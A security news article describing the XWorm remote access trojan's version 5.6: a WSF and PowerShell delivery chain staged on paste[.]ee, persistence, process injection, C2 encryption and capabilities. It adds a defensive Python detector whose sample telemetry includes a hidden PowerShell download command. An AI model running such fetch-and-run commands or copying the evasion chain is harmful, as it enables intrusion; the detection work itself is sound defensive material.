XWorm is a .NET remote access trojan that has drawn attention for its obfuscation techniques and for the degree of control it gives an operator over an infected system. Its stealthy delivery and layered evasion make it a persistent problem for defenders.
Researchers from NetSkope have recently described a new XWorm variant that is delivered through Windows script files. The malware, first identified in 2022, has now reached version 5.6, showing how steadily it is being maintained and extended.
XWorm Delivered Via Windows Script
This .NET-based threat begins its infection chain with a Windows Script File (WSF), which downloads and executes an obfuscated PowerShell script hosted on paste[.]ee. That script drops several files, including “VsLabs.vbs,” “VsEnhance.bat,” and “VsLabsData.ps1,” into the directory C:ProgramDataMusicVisuals. To maintain persistence, it creates a scheduled task named “MicroSoftVisualsUpdater.”
Beyond the initial delivery, XWorm uses several evasion techniques, including reflective loading of a DLL loader (NewPE2) and process injection into legitimate processes such as RegSvcs.exe. It communicates with its command and control (C2) server over TCP sockets, encrypting traffic with AES in ECB mode and using a modified MD5 hash as the key.
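The delivery chain above gives defenders several concrete signals to look for: the scheduled task name, the dropped file names, a PowerShell child of a script host pulling from paste[.]ee, and RegSvcs.exe appearing where it does not belong. The following is an added example, not code from the article or from NetSkope, that classifies constructed endpoint telemetry against those signals; it assumes WSF files are launched by wscript.exe/cscript.exe and treats a RegSvcs.exe process spawned by PowerShell as the injection signal, both of which are assumptions rather than details from the report.

```python
import re
from dataclasses import dataclass

# Indicators named in the article (task name, dropped files, staging site,
# injection target). Everything else here is an assumption for illustration.
TASK_NAME = "microsoftvisualsupdater"
DROPPED_FILES = {"vslabs.vbs", "vsenhance.bat", "vslabsdata.ps1"}
STAGING_HOST = "paste.ee"
INJECTION_TARGET = "regsvcs.exe"
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")  # assumed WSF launchers

@dataclass
class Event:
    kind: str           # "process", "file" or "task"
    image: str = ""     # process image, or the path of a written file
    parent: str = ""    # parent process image
    cmdline: str = ""
    task_name: str = ""

def _base(path: str) -> str:
    """Lower-cased final path component, tolerant of / and \\ separators."""
    return re.split(r"[\\/]", path.lower())[-1]

def classify(ev: Event) -> list[str]:
    """Return the XWorm-chain signals that one event matches (may be empty)."""
    hits = []
    if ev.kind == "task" and ev.task_name.lower() == TASK_NAME:
        hits.append("persistence_task")
    if ev.kind == "file" and _base(ev.image) in DROPPED_FILES:
        hits.append("dropped_file")
    if ev.kind == "process":
        if (_base(ev.parent) in SCRIPT_HOSTS and _base(ev.image) == "powershell.exe"
                and STAGING_HOST in ev.cmdline.lower()):
            hits.append("script_host_powershell_download")
        if _base(ev.image) == INJECTION_TARGET and _base(ev.parent) == "powershell.exe":
            hits.append("regsvcs_child_of_powershell")  # assumed parent, see lead-in
    return hits

def scan(events: list[Event]) -> dict[str, int]:
    """Count signals per type; several distinct signals on one host indicate the chain."""
    counts: dict[str, int] = {}
    for ev in events:
        for h in classify(ev):
            counts[h] = counts.get(h, 0) + 1
    return counts

# Constructed sample telemetry, not real captures; the directory and URL path are placeholders.
SAMPLE = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\wscript.exe", "powershell -w hidden iwr https://paste.ee/r/PLACEHOLDER"),
    Event("file", r"C:\ProgramData\placeholder\VsLabs.vbs"),
    Event("task", task_name="MicroSoftVisualsUpdater"),
    Event("process", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Event("process", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe"),
]
```

Any single signal can have a benign explanation (RegSvcs.exe is a legitimate .NET tool), so alert on the combination across one host rather than on individual hits.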
The latest features introduced in version 5.6 include the capability to remove plugins and a “Pong” command designed for response time reporting. This evolution underscores the malware’s increasing sophistication.
XWorm is adept at conducting extensive reconnaissance on infected systems, gathering information about hardware, software, and user privileges. Upon successful infection, it even alerts attackers via Telegram, facilitating real-time communication.
The malware’s techniques allow it to access sensitive information, establish remote access, and deploy additional malware while remaining undetected. XWorm uses multiple attack vectors and can modify the hosts file on compromised systems to redirect name resolution for malicious purposes.
Moreover, XWorm is capable of launching Distributed Denial of Service (DDoS) attacks by sending repetitive POST requests to targeted IP addresses and ports. It can capture screenshots using the CopyFromScreen function, storing them as JPEG images in memory before transmission.
The malware executes a wide array of commands, including system manipulation (shutdown, restart, logoff), file operations, and remote code execution through PowerShell. It can also download and execute additional payloads, send HTTP requests, and persistently install plugins.
Communication with the C2 server is structured using a well-defined message format, often incorporating the victim’s system information. Another notable feature is process monitoring, which allows certain operations to be conducted discreetly, hiding activities from the user.
Taken together, this toolkit gives attackers extensive access to and control over compromised systems, which is why XWorm remains a significant threat.